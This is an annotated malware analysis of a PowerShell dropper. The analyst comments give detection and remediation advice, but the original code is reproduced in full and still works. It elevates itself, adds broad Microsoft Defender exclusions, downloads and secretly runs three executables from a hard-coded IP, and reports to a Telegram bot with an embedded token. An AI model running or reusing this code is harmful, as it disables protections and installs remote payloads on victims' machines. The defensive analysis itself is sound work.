# Analyst annotation (code unchanged, only line breaks restored and comments added).
# The file-type hint says C#, but the content is a PowerShell downloader/dropper.
# Visible behaviour, in order:
#   1. relaunches itself elevated with the execution policy bypassed,
#   2. adds broad Microsoft Defender exclusions,
#   3. downloads three executables from one hard-coded IP address into
#      random five-digit folders under %TEMP%,
#   4. starts each one, preferably with a hidden window,
#   5. reports every step to a Telegram chat through the Bot API.
# Indicators on this page: the bot token and chat id, host 144.31.53.218,
# the three URL paths, the on-disk names, and the %TEMP%\ExeDownloads folder.

# Hide progress bars so nothing is drawn while the script runs.
$ProgressPreference = 'SilentlyContinue'
[Console]::OutputEncoding = [System.Text.Encoding]::UTF8
# Restrict .NET web requests (used by Send-TelegramMessage below) to TLS 1.2.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

# Elevation stage: if the current token is not in the built-in Administrators role,
# start a new powershell.exe on the same script file with -Verb RunAs and exit this instance.
# Detection: process-creation telemetry showing powershell.exe with
# "-NoProfile -ExecutionPolicy Bypass -File <path>" spawned by powershell.exe, paired with a
# UAC consent prompt. Script block logging (event 4104) records the script text if enabled.
if (-NOT ([Security.Principal.WindowsPrincipal]::new([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
    Start-Process powershell.exe "-NoProfile -ExecutionPolicy Bypass -File `"$PSCommandPath`"" -Verb RunAs
    exit
}

# Hard-coded Telegram bot credential and destination chat. Both are stable indicators for
# hunting across samples and for an abuse report to the platform.
$botToken = "8704858544:AAHbqNtM5sKth_ElmNTv1z96lRexadYmznE"
$chatId = "-1003980351221"

# Status beacon: POSTs a JSON body (chat_id, text, parse_mode) to the Bot API sendMessage
# endpoint using System.Net.WebRequest.
# The empty catch swallows every failure, so a blocked request produces no visible error.
# Detection: outbound HTTPS to api.telegram.org from powershell.exe on a host that has no
# business reason to use Telegram. The messages sent below include $env:COMPUTERNAME.
function Send-TelegramMessage {
    param ([string]$Message)
    try {
        $url = "https://api.telegram.org/bot$botToken/sendMessage"
        $body = @{ chat_id = $chatId; text = $Message; parse_mode = "HTML" }
        $json = $body | ConvertTo-Json
        $bytes = [System.Text.Encoding]::UTF8.GetBytes($json)
        $webRequest = [System.Net.WebRequest]::Create($url)
        $webRequest.Method = "POST"
        $webRequest.ContentType = "application/json"
        $webRequest.ContentLength = $bytes.Length
        $stream = $webRequest.GetRequestStream()
        $stream.Write($bytes, 0, $bytes.Length)
        $stream.Close()
        $webRequest.GetResponse().Close()
    } catch {}
}

Send-TelegramMessage -Message "[INFO] Script started on $env:COMPUTERNAME"
Send-TelegramMessage -Message "[INFO] Adding exclusions..."

# Defence-impairment stage: asks Defender to stop scanning whole directory trees, including
# every user profile, plus the current user's TEMP and APPDATA.
# Errors are suppressed, so a policy that rejects the change fails silently.
# Detection/mitigation: Defender logs configuration changes (event 5007 in the
# Microsoft-Windows-Windows Defender/Operational log). Alert on Add-MpPreference with
# -ExclusionPath or -ExclusionExtension in command lines and script block logs.
# Centrally managed exclusion lists with local-admin merge disabled limit what a local
# administrator can add. NOTE(review): confirm how the fleet is configured.
$exclusions = @(
    "C:\Program Files (x86)"
    "C:\Users"
    "$env:TEMP"
    "$env:APPDATA"
)
foreach ($path in $exclusions) {
    Add-MpPreference -ExclusionPath $path -ErrorAction SilentlyContinue
}
# Also requests an extension-based exclusion aimed at executables.
Add-MpPreference -ExclusionExtension "*.exe" -ErrorAction SilentlyContinue
Send-TelegramMessage -Message "[OK] Exclusions added. Waiting before downloads..."
Start-Sleep -Seconds 5

# Creates %TEMP%\ExeDownloads. Nothing in the visible script writes into it (downloads go
# to the random folders below), so an empty folder of this name is a leftover artifact.
$tempDir = Join-Path $env:TEMP "ExeDownloads"
if (-not (Test-Path $tempDir)) {
    New-Item -ItemType Directory -Path $tempDir -Force | Out-Null
}

# Payload list: three executables fetched from one bare IP address over HTTPS.
# Two are saved under names that differ from the URL path. conhost.exe and services.exe
# are names of Windows system processes, so triage should key on image path, not name:
# these run from %TEMP%\<5 digits>\, not from the Windows system directory.
$files = @(
    @{url="https://144.31.53.218/conhost.exe"; name="conhost.exe"},
    @{url="https://144.31.53.218/neverwb.exe"; name="WindowsAudioGraph.exe"},
    @{url="https://144.31.53.218/neverrt.exe"; name="services.exe"}
)

# Prefer curl.exe when it is on the path, otherwise fall back to certutil.
$useCurl = $null -ne (Get-Command curl.exe -ErrorAction SilentlyContinue)

foreach ($item in $files) {
    $url = $item.url
    $name = $item.name
    # Each payload gets its own folder named with a random five-digit number under %TEMP%.
    $rnd = Get-Random -Minimum 10000 -Maximum 99999
    $folder = "$env:TEMP\$rnd"
    $filePath = "$folder\$name"
    New-Item -ItemType Directory -Path $folder -Force | Out-Null
    Send-TelegramMessage -Message "[INFO] Downloading: $name"
    $success = $false
    # Up to five download attempts. "Success" means only that a file exists at the target
    # path; the content is not checked.
    # Detection: curl.exe or "certutil -urlcache -split -f" launched by powershell.exe and
    # writing an .exe under %TEMP%; an HTTPS connection to an IP literal rather than a hostname.
    for ($i = 1; $i -le 5; $i++) {
        try {
            if ($useCurl) {
                curl.exe -L --retry 3 --retry-delay 2 -o "$filePath" "$url" --silent
            } else {
                certutil -urlcache -split -f "$url" "$filePath" | Out-Null
            }
            if (Test-Path $filePath) { $success = $true; break }
        } catch {}
        Start-Sleep -Seconds 3
    }
    if ($success) {
        Send-TelegramMessage -Message "[OK] Downloaded: $name"
        # Adds a per-file Defender exclusion for the downloaded binary before running it.
        Add-MpPreference -ExclusionPath $filePath -ErrorAction SilentlyContinue
        # Execution stage: start with a hidden window, or with default window settings
        # if the first attempt throws.
        try {
            Start-Process -FilePath $filePath -WindowStyle Hidden -ErrorAction Stop
            Send-TelegramMessage -Message "[OK] Started: $name"
        } catch {
            Start-Process -FilePath $filePath -ErrorAction SilentlyContinue
            Send-TelegramMessage -Message "[OK] Started (fallback): $name"
        }
    } else {
        Send-TelegramMessage -Message "[ERROR] Failed: $name"
    }
    Start-Sleep -Seconds 3
}

# The visible script removes nothing it created: the folders, downloaded files and Defender
# exclusions all remain for response and forensics. Remediation should revert the exclusions
# as well as remove the binaries.
Send-TelegramMessage -Message "[OK] All files processed on $env:COMPUTERNAME"
Start-Sleep -Seconds 10